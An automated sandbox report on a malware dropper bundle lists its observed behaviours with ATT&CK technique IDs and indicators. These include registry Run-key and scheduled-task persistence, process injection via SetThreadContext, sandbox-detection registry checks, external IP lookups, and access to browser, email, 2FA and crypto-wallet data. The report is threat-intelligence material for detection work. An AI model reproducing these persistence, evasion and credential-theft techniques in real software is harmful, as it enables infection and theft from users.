djvu | 8485c644c0a96ff0d9256b10e2c50ee462868432080b6f27869d96edf77a7d0e

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\International\Geo\Nation	Goshekycezhae.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\International\Geo\Nation	civdata.exe

Loads dropped DLL 49 IoCs

pid	Process
1092	setup_install.exe
1092	setup_install.exe
1092	setup_install.exe
1092	setup_install.exe
1092	setup_install.exe
1092	setup_install.exe
1092	setup_install.exe
1092	setup_install.exe
3052	Sun15b61bf18b0f1.tmp
5052	setup_2.tmp
4024	Sun150d896340a863.exe
4024	Sun150d896340a863.exe
5024	setup_2.tmp
4948	rundll32.exe
3988	rundll32.exe
7008	installer.exe
7008	installer.exe
7008	installer.exe
6508	MsiExec.exe
6508	MsiExec.exe
6088	rundll32.exe
6268	MsiExec.exe
6268	MsiExec.exe
6268	MsiExec.exe
6268	MsiExec.exe
6268	MsiExec.exe
6268	MsiExec.exe
6268	MsiExec.exe
6268	MsiExec.exe
6268	MsiExec.exe
6268	MsiExec.exe
7008	installer.exe
6268	MsiExec.exe
6268	MsiExec.exe
5256	MicrosoftEdgeCP.exe
5256	MicrosoftEdgeCP.exe
5256	MicrosoftEdgeCP.exe
5256	MicrosoftEdgeCP.exe
5256	MicrosoftEdgeCP.exe
5256	MicrosoftEdgeCP.exe
5256	MicrosoftEdgeCP.exe
6268	MsiExec.exe
4884	80C7.exe
4884	80C7.exe
4884	80C7.exe
4884	80C7.exe
4884	80C7.exe
5244	build2.exe
5244	build2.exe

Modifies file permissions 1 TTPs 1 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
5148	icacls.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	sqtvvs.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\downloadmanager.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\downloadmanager.\\downloadmanager.exe"	sqtvvs.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\25eb2d70-8e4b-4053-8e92-2f671145a411\\5E69.exe\" --AutoStart"	5E69.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe"	2895414.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Internet Explorer\\Gixatanenae.exe\""	46807GHF____.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates connected drives 3 TTPs 48 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\E:	installer.exe
File opened (read-only)	\??\M:	installer.exe
File opened (read-only)	\??\P:	installer.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\G:	installer.exe
File opened (read-only)	\??\H:	installer.exe
File opened (read-only)	\??\O:	installer.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\N:	installer.exe
File opened (read-only)	\??\Y:	installer.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\F:	installer.exe
File opened (read-only)	\??\X:	installer.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\B:	installer.exe
File opened (read-only)	\??\Q:	installer.exe
File opened (read-only)	\??\S:	installer.exe
File opened (read-only)	\??\T:	installer.exe
File opened (read-only)	\??\U:	installer.exe
File opened (read-only)	\??\W:	installer.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\A:	installer.exe
File opened (read-only)	\??\Z:	installer.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\I:	installer.exe
File opened (read-only)	\??\J:	installer.exe
File opened (read-only)	\??\L:	installer.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\K:	installer.exe
File opened (read-only)	\??\R:	installer.exe
File opened (read-only)	\??\V:	installer.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 9 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
560	api.2ip.ua
797	api.2ip.ua
865	api.2ip.ua
864	api.2ip.ua
8	ip-api.com
102	ip-api.com
505	api.2ip.ua
506	api.2ip.ua
776	api.2ip.ua

Drops file in System32 directory 17 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\Tasks\Azure-Update-Task	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\644B8874112055B5E195ECB0E8F243A4	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\services64	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #2	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #4	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #6	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\sqtvvs.exe	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\644B8874112055B5E195ECB0E8F243A4	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Firefox Default Browser Agent D5971307F34FB8A6	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedUpdater	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #3	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #1	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #5	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Time Trigger Task	svchost.exe

Suspicious use of SetThreadContext 64 IoCs

description	pid	Process	procid_target
PID 3928 set thread context of 4764	3928	2468946.exe	119
PID 2724 set thread context of 768	2724	svchost.exe	143
PID 5300 set thread context of 5336	5300	inupda.exe	154
PID 5220 set thread context of 4996	5220	sqtvvs.exe	161
PID 5392 set thread context of 4916	5392	sqtvvs.exe	207
PID 4208 set thread context of 6348	4208	civdata.exe	224
PID 5872 set thread context of 4728	5872	services64.exe	234
PID 4544 set thread context of 1160	4544	5E69.exe	241
PID 4808 set thread context of 5536	4808	taskkill.exe	247
PID 5012 set thread context of 5244	5012	build2.exe	253
PID 5376 set thread context of 3116	5376	build3.exe	258
PID 7040 set thread context of 6336	7040	sqtvvs.exe	248
PID 5848 set thread context of 4920	5848	sqtvvs.exe	271
PID 6848 set thread context of 5772	6848	mstsca.exe	273
PID 6232 set thread context of 4140	6232	sqtvvs.exe	277
PID 3916 set thread context of 4572	3916	mstsca.exe	279
PID 5788 set thread context of 6292	5788	sqtvvs.exe	281
PID 5680 set thread context of 1704	5680	mstsca.exe	283
PID 5464 set thread context of 7128	5464	sqtvvs.exe	290
PID 2276 set thread context of 568	2276	mstsca.exe	292
PID 4708 set thread context of 6732	4708	sqtvvs.exe	294
PID 6264 set thread context of 4832	6264	mstsca.exe	296
PID 6784 set thread context of 5640	6784	sqtvvs.exe	298
PID 5656 set thread context of 4016	5656	mstsca.exe	300
PID 1764 set thread context of 3668	1764	sqtvvs.exe	302
PID 6348 set thread context of 6536	6348	mstsca.exe	304
PID 5352 set thread context of 6848	5352	sqtvvs.exe	308
PID 4992 set thread context of 2992	4992	mstsca.exe	310
PID 5704 set thread context of 7048	5704	sqtvvs.exe	312
PID 4348 set thread context of 3964	4348	mstsca.exe	315
PID 3148 set thread context of 4948	3148	sqtvvs.exe	317
PID 3800 set thread context of 5980	3800	mstsca.exe	319
PID 5920 set thread context of 2688	5920	sqtvvs.exe	321
PID 5952 set thread context of 188	5952	mstsca.exe	323
PID 3976 set thread context of 2364	3976	sqtvvs.exe	327
PID 4736 set thread context of 6356	4736	mstsca.exe	329
PID 6864 set thread context of 5452	6864	sqtvvs.exe	331
PID 7052 set thread context of 4100	7052	mstsca.exe	333
PID 3476 set thread context of 4264	3476	5E69.exe	335
PID 5656 set thread context of 552	5656	sqtvvs.exe	338
PID 348 set thread context of 664	348	mstsca.exe	340
PID 2284 set thread context of 5632	2284	sqtvvs.exe	342
PID 68 set thread context of 1944	68	mstsca.exe	344
PID 6212 set thread context of 4992	6212	sqtvvs.exe	348
PID 7124 set thread context of 5984	7124	mstsca.exe	350
PID 5840 set thread context of 6952	5840	sqtvvs.exe	352
PID 1360 set thread context of 4340	1360	mstsca.exe	354
PID 5256 set thread context of 3480	5256	sqtvvs.exe	356
PID 6116 set thread context of 3944	6116	mstsca.exe	358
PID 5908 set thread context of 2676	5908	5E69.exe	360
PID 4188 set thread context of 3148	4188	sqtvvs.exe	363
PID 3456 set thread context of 3800	3456	mstsca.exe	365
PID 2808 set thread context of 2364	2808	sqtvvs.exe	368
PID 6172 set thread context of 6888	6172	mstsca.exe	370
PID 4532 set thread context of 1568	4532	sqtvvs.exe	372
PID 6352 set thread context of 6328	6352	mstsca.exe	374
PID 2248 set thread context of 2264	2248	sqtvvs.exe	376
PID 5464 set thread context of 4256	5464	mstsca.exe	378
PID 1288 set thread context of 7052	1288	sqtvvs.exe	380
PID 4352 set thread context of 3116	4352	mstsca.exe	382
PID 3704 set thread context of 6760	3704	5E69.exe	386
PID 6524 set thread context of 1104	6524	sqtvvs.exe	388
PID 580 set thread context of 3628	580	mstsca.exe	390
PID 2304 set thread context of 1448	2304	sqtvvs.exe	392

Drops file in Program Files directory 15 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exe	msiexec.exe
File created	C:\Program Files (x86)\AW Manager\Windows Manager\Uninstall.lnk	msiexec.exe
File opened for modification	C:\Program Files (x86)\AW Manager\Windows Manager\EULA.url	msiexec.exe
File created	C:\Program Files (x86)\UltraMediaBurner\is-7QII0.tmp	ultramediaburner.tmp
File created	C:\Program Files (x86)\UltraMediaBurner\is-EEP2M.tmp	ultramediaburner.tmp
File created	C:\Program Files\Windows Mail\DBHCHLZAAQ\ultramediaburner.exe.config	46807GHF____.exe
File opened for modification	C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe	ultramediaburner.tmp
File created	C:\Program Files (x86)\Internet Explorer\Gixatanenae.exe.config	46807GHF____.exe
File opened for modification	C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.ini	msiexec.exe
File created	C:\Program Files\Windows Mail\DBHCHLZAAQ\ultramediaburner.exe	46807GHF____.exe
File created	C:\Program Files (x86)\Internet Explorer\Gixatanenae.exe	46807GHF____.exe
File created	C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe	msiexec.exe
File opened for modification	C:\Program Files (x86)\AW Manager\Windows Manager\Privacy.url	msiexec.exe
File created	C:\Program Files (x86)\UltraMediaBurner\unins000.dat	ultramediaburner.tmp
File opened for modification	C:\Program Files (x86)\UltraMediaBurner\unins000.dat	ultramediaburner.tmp

Drops file in Windows directory 35 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Installer\MSICCD5.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe	msiexec.exe
File opened for modification	C:\Windows\Installer\f75bba0.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC172.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC8CA.tmp	msiexec.exe
File created	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC704.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIBE6F.tmp	msiexec.exe
File created	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe	msiexec.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File opened for modification	C:\Windows\Installer\MSIC066.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC5E9.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC677.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSICF3B.tmp	msiexec.exe
File created	C:\Windows\AppCompat\Programs\Amcache.hve.tmp	WerFault.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIBFD7.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC4DE.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File created	C:\Windows\Installer\SourceHash{C845414C-903C-4218-9DE7-132AB97FDF62}	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC8DB.tmp	msiexec.exe
File created	C:\Windows\Installer\f75bba0.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSICFD8.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe	msiexec.exe
File created	C:\Windows\Installer\f75bba3.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSICEEC.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC0A5.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC114.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSICE5D.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSICEAC.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSID336.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC055.tmp	msiexec.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File opened for modification	C:\Windows\Installer\MSICDB0.tmp	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 15 IoCs

pid	pid_target	Process	procid_target
1612	1632	WerFault.exe	87
3424	4436	WerFault.exe	100
4824	3928	WerFault.exe	113
4676	4596	WerFault.exe	103
4668	1632	WerFault.exe	87
4536	4596	WerFault.exe	103
4700	1632	WerFault.exe	87
4432	4596	WerFault.exe	103
4116	1632	WerFault.exe	87
4204	4596	WerFault.exe	103
3956	4596	WerFault.exe	103
4664	4596	WerFault.exe	103
3104	1632	WerFault.exe	87
5248	1632	WerFault.exe	87
5428	1632	WerFault.exe	87

Checks SCSI registry key(s) 3 TTPs 9 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rsvdeid
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rsvdeid
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Sun15223697c98.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rsvdeid
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rsvdeid
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rsvdeid
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Sun15223697c98.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Sun15223697c98.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rsvdeid

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Sun150d896340a863.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	svchost.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	build2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	build2.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Sun150d896340a863.exe

Creates scheduled task(s) 1 TTPs 6 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

pid	Process
6984	schtasks.exe
5220	schtasks.exe
5616	schtasks.exe
6212	schtasks.exe
5768	schtasks.exe
4944	schtasks.exe

Delays execution with timeout.exe 8 IoCs

evasion

pid	Process
5972	timeout.exe
6880	timeout.exe
4564	timeout.exe
6260	timeout.exe
4796	timeout.exe
4320	timeout.exe
5896	timeout.exe
5480	timeout.exe

Kills process with taskkill 6 IoCs

evasion

pid	Process
4808	taskkill.exe
3940	taskkill.exe
6060	taskkill.exe
3792	taskkill.exe
7068	taskkill.exe
6336	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 4 IoCs

adware spyware

Modify Registry

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe

Modifies data under HKEY_USERS 19 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\Version = "7"	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache	svchost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	svchost.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\16\52C64B7E	msiexec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17	msiexec.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaV = "Microsoft"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{62FM2EJ3-714D-A09D-WM25-6QFJ226I1FER}	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion\NextUpdateDate = "338314416"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaV = "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Speech_OneCore\\Recognizers\\Tokens\\MS-1033-110-WINMO-DNN"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaV = "{BAE3E62C-37D4-49AC-A6F1-0E485ECD6757}"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VendorId = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\33across.com\NumberOfSubdoma = "0"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaV = "Microsoft David Mobile"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\mj22.xyz\Total = "381"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionHigh = "268435456"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaV = "DebugPlugin"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "395205405"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0"	MicrosoftEdge.exe
